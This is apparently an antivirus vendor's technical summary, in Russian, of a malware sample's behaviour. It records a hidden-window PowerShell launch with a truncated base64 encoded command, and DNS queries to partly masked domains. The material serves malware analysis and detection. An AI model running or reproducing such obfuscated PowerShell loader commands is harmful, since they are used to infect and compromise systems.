Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAATAB5AGoAaQBjAGQAcgBnAHkAcwBtAGcAdQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBWAGIAbgBiAGwAawB5AG0AbgBvAHgAIAAjAD4AIAAkAFcAcgB0AGIAeABzAHQAcQBtAHcAPQ...
- DNS ASK fo####ydelivery.com
- DNS ASK er####rinsaat.net
- DNS ASK bl##.###covermichigan.com
- DNS ASK pr##kat.net
- DNS ASK gy##tak.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -EncoD PAAjACAATAB5AGoAaQBjAGQAcgBnAHkAcwBtAGcAdQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBWAGIAbgBiAGwAawB5AG0AbgBvAHgAIAAjAD4AIAAkAFcAcgB0AGIAeABzAHQAcQBtAHcAPQ...' (со скрытым окном)